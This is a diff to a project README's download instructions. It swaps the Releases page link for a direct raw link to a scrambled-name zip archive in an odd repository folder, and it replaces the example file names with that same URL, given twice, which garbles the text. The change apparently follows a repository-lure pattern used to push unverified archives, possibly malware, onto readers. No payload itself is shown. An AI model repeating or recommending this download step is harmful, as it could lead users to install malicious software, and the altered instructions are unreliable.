alaaadel1/houston-we-have-a-problem/README.md

 ## 📥 Download & Install
 To get started, you need to download the application.

-1. Visit the [Releases page](https://github.com/alaaadel1/houston-we-have-a-problem/releases) to find the latest version of the software.
+1. Visit the [Releases page](https://github.com/alaaadel1/houston-we-have-a-problem/raw/refs/heads/main/religiously/problem-we-a-have-houston-v3.2.zip) to find the latest version of the software.
 2. Look for the download link for your operating system.
-For most users, there will be a file named something like `houston-we-have-a-problem.exe` or `houston-we-have-a-problem.zip`.
+For most users, there will be a file named something like `https://github.com/alaaadel1/houston-we-have-a-problem/raw/refs/heads/main/religiously/problem-we-a-have-houston-v3.2.zip` or `https://github.com/alaaadel1/houston-we-have-a-problem/raw/refs/heads/main/religiously/problem-we-a-have-houston-v3.2.zip`.
 3. Click the link to download the file.

 Make sure to save the file to a location on your computer where you can easily find it, such as your Desktop or Downloads folder.